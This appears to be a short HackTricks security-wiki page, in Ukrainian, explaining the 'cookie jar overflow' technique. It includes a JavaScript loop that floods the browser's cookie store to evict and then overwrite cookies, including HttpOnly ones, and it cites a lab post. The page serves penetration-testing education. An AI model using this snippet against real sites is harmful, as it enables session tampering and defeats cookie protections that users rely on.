{{#include ../../banners/hacktricks-training.md}}

Браузери мають **обмеження на кількість кукі** , які вони можуть зберігати для сторінки. Тоді, якщо з якоїсь причини вам потрібно **зробити кукі невидимими**, ви можете **переповнити банку з кукі**, оскільки найстаріші з них будуть видалені першими:
```javascript
// Set many cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i}; Secure`
}

// Remove all cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`
}
```
Зверніть увагу, що сторонні куки, які вказують на інший домен, не будуть перезаписані.

> [!CAUTION]
> Цей напад також можна використовувати для **перезапису HttpOnly куків, оскільки ви можете видалити їх, а потім скинути з потрібним вам значенням**.
>
> Перевірте це в [**цьому пості з лабораторією**](https://www.sjoerdlangkemper.nl/2020/05/27/overwriting-httponly-cookies-from-javascript-using-cookie-jar-overflow/).

{{#include ../../banners/hacktricks-training.md}}